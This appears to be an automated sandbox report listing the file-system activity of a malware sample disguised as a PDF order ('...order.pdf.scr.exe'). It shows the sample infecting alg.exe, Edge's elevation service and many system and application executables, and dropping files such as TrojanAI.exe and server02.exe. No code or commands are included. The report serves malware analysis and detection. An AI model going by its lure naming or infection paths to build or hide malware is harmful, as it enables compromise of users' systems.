Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\FXSSVC.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\sppsvc.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\SensorDataService.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\msdtc.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	System file written: C:\Windows\System32\alg.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7zFM.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\VSSVC.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\wbengine.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\SearchIndexer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\AgentService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to behavior

Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\vds.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\snmptrap.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\Spectrum.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Program Files\Windows Media Player\wmpnetwk.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\Locator.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\7-Zip\7z.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\7-Zip\7zG.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\SysWOW64\perfhost.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File created: C:\Users\user\AppData\Local\bothsided\surmit.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\TieringEngineService.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\updater.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File created: C:\Users\user\AppData\Local\Temp\neworigin.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\FXSSVC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File created: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\sppsvc.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\SensorDataService.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	File created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\msdtc.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Order SMG 201906 20190816order.pdf.scr.exe	File created: C:\Windows\System32\alg.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\7-Zip\7zFM.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File created: C:\Users\user\AppData\Local\Temp\server02.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Windows\System32\alg.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to dropped file
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	File created: C:\Windows\System32\VSSVC.exe	Jump to dropped file
